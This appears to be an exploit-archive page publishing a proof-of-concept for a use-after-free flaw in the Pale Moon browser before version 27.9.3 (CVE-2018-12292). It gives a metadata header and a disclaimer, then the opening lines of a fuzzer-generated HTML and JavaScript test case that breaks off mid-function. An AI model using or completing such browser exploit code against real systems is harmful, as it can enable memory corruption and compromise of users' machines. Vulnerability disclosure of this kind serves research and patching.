Pale moon browser < 27.9.3 use after free (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-06-18 |
Type : local |
Platform : windows
This exploit / vulnerability Pale moon browser < 27.9.3 use after free (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC)
# Date: 2018-06-13
# Author - Berk Cem Goksel
# Vendor Homepage: https://www.palemoon.org/
# Software Link: https://www.palemoon.org/palemoon-win32.shtml
# Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2)
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2018-12292
<html>
<head>
<style>
</style>
<script>
function SetVariable(fuzzervars, var_name, var_type) {
fuzzervars[var_type] = var_name;
}
function jsfuzzer() {
var var_1 = var_2.getDistributedNodes();
SetVariable(var_1, 'NodeList');